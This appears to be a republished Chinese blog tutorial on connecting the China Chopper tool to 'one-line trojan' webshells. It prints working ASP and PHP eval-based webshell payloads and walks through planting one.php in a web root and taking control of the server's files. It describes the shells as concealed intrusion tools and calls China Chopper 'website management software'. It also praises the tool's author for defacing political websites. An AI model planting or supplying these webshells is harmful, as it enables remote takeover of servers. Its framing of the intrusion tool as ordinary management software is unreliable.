中国菜刀连接一句话木马

Posted wangyuebo

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了中国菜刀连接一句话木马相关的知识,希望对你有一定的参考价值。

中国菜刀的由来:

说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/php/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。

中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!

 

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

常用一句话木马如下:
asp一句话木马:
   <%execute(request("value"))%>
php一句话木马:
   <?php @eval($_POST[value]);?>

下面是通过php一句话木马来连接服务器。操作流程如下:

前提准备条件:

1.搭建php+mysql环境,我用的是phpstudy。

2.中国菜刀软件。

3.php一句话木马。

代码为:<?php @eval($_POST[‘test‘]);?> 文件名为one.php。

代码意思是:通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。其中test就是通过菜刀连接一句话的密码。

一、将文件名one.php放入phpstudy网站根目录下。如下图所示:

技术图片

 

 

二、打开中国菜刀软件,进行连接操作,看是否能够连接服务器,如下图所示:

技术图片

 

 

 

三、当点击添加时,就顺利的连接上服务器。此时可以在服务器进行增加、删除、修改操作。如下图所示:

技术图片

 

以上是关于中国菜刀连接一句话木马的主要内容,如果未能解决你的问题,请参考以下文章

如何使用JSP一句话木马和菜刀木马

关于中国菜刀,如何"切菜"

一句话木马:初识木马练习

文件上传——不为人知的木马上传大法

sql-lab闯关之7

过狗菜刀原理以及绕过魔术引号的配置